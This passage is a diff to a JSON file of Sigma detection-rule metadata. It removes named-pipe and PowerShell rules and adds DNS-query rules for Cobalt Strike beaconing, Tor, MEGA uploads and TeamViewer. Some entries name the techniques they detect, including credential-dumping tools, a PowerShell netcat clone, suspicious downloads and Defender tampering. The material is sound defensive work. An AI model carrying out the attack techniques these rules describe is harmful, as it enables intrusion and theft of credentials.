"attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain" + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/09", "falsepositive": [ "Unknown" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml", - "level": "high", - "logsource.category": "network_connection", + "filename": "dns_query_win_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1071.004" ] }, - "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "value": "Suspicious Program Location with Network Connections" + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing" }, { - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/05/15", - "falsepositive": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" - ], - "filename": "net_connection_win_susp_rdp.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "value": "Suspicious Outbound RDP Connections" - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/12", - "falsepositive": [ - "Legitimate use of wuauclt.exe over the network." - ], - "filename": "net_connection_win_wuauclt_network_connection.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "value": "Wuauclt Network Connection" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/09/12", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." - ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", - "level": "medium", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "value": "Alternate PowerShell Hosts Pipe" - }, - { - "description": "Detects a named pipe used by Turla group samples", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/06", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_apt_turla_namedpipes.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://attack.mitre.org/groups/G0010/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", - "value": "Turla Group Named Pipes" - }, - { - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ] - }, - "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "value": "Cred Dump-Tools Named Pipes" - }, - { - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unlikely" - ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", - "value": "DiagTrackEoP Default Named Pipe" - }, - { - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "meta": { "author": "Florian Roth", - "creation_date": "2021/08/23", + "creation_date": "2022/01/30", "falsepositive": [ - "Unknown" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "filename": "pipe_created_efspotato_namedpipe.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", - "https://github.com/zcgonvh/EfsPotato", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", - "value": "EfsPotato Named Pipe" - }, - { - "description": "Detects creation of default named pipes used by the Koh tool", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "pipe_created_koh_default_pipe.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" - ] - }, - "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "value": "Koh Default Named Pipes" - }, - { - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/25", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_cobaltstrike.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", - "https://github.com/Neo23x0/sigma/issues/253", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "value": "CobaltStrike Named Pipe" - }, - { - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_cobaltstrike_re.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "value": "CobaltStrike Named Pipe Pattern Regex" - }, - { - "description": "Detects the creation of a named pipe used by known APT malware", - "meta": { - "author": "Florian Roth, blueteam0ps, elhoim", - "creation_date": "2017/11/06", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_namedpipes.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "value": "Malicious Named Pipe" - }, - { - "description": "Detects PAExec default named pipe", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_paexec_default_pipe.yml", + "filename": "dns_query_win_susp_teamviewer.yml", "level": "medium", - "logsource.category": "pipe_created", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "value": "PAExec Default Named Pipe" - }, - { - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_powershell_execution_pipe.yml", - "level": "informational", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "value": "PowerShell Execution Via Named Pipe" - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_psexec_default_pipe.yml", - "level": "low", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "value": "PsExec Default Named Pipe" - }, - { - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/04", - "falsepositive": [ - "Rare legitimate use of psexec from the locations mentioned above" - ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "value": "PsExec Tool Execution From Suspicious Locations - PipeName" - }, - { - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/05/10", - "falsepositive": [ - "Legitimate Administrator activity" - ], - "filename": "pipe_created_psexec_pipes_artifacts.yml", - "level": "medium", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "value": "PsExec Pipes Artifacts" - }, - { - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2021/10/08", - "falsepositive": [ - "Processes in the filter condition" - ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", - "https://github.com/Azure/SimuLand", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ] - }, - "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "value": "ADFS Database Named Pipe Connection" - }, - { - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "meta": { - "author": "Florian Roth, Christian Burkard", - "creation_date": "2021/07/30", - "falsepositive": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" - ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "value": "CobaltStrike Named Pipe Patterns" - }, - { - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" - ], - "tags": [ - "attack.t1047", - "attack.execution" - ] - }, - "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "value": "WMI Event Consumer Created Named Pipe" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "filename": "posh_pc_alternate_powershell_hosts.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", - "value": "Alternate PowerShell Hosts" - }, - { - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "meta": { - "author": "frack113", - "creation_date": "2021/06/03", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" - ], - "filename": "posh_pc_delete_volume_shadow_copies.yml", - "level": "high", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "value": "Delete Volume Shadow Copies Via WMI With PowerShell" - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "meta": { - "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", - "creation_date": "2017/03/22", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_downgrade_attack.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6331d09b-4785-4c13-980f-f96661356249", - "value": "PowerShell Downgrade Attack - PowerShell" - }, - { - "description": "Detects PowerShell called from an executable by the version mismatch method", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_exe_calling_ps.yml", - "level": "high", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "value": "PowerShell Called from an Executable Version Mismatch" - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_powercat.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" ], "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1219" ] }, - "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", - "value": "Netcat The Powershell Version" + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access" }, { - "description": "Detects remote PowerShell sessions", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", + "author": "frack113", + "creation_date": "2022/02/20", "falsepositive": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], - "filename": "posh_pc_remote_powershell_session.yml", + "filename": "dns_query_win_tor_onion.yml", "level": "high", - "logsource.category": "ps_classic_start", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.command_and_control", + "attack.t1090.003" ] }, - "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", - "value": "Remote PowerShell Session (PS Classic)" + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address" }, { - "description": "Detects renamed powershell", - "meta": { - "author": "Harish Segar, frack113", - "creation_date": "2020/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_renamed_powershell.yml", - "level": "low", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", - "value": "Renamed Powershell Under Powershell Channel" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "Detect suspicious LDAP request from non-Windows application", "meta": { "author": "frack113", - "creation_date": "2021/07/13", + "creation_date": "2022/08/20", "falsepositive": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "filename": "dns_query_win_susp_ldap.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" - }, - { - "description": "Detects suspicious PowerShell download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_pc_susp_download.yml", - "level": "medium", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "value": "Suspicious PowerShell Download" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_susp_get_nettcpconnection.yml", - "level": "low", - "logsource.category": "ps_classic_start", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" ], "tags": [ "attack.discovery", - "attack.t1049" + "attack.t1482" ] }, - "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", - "value": "Use Get-NetTCPConnection" + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).", "meta": { - "author": "frack113", - "creation_date": "2021/07/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_susp_zip_compress.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" - }, - { - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "meta": { - "author": "frack113", - "creation_date": "2021/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_tamper_with_windows_defender.yml", - "level": "high", - "logsource.category": "ps_classic_provider_start", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "value": "Tamper Windows Defender - PSClassic" - }, - { - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": 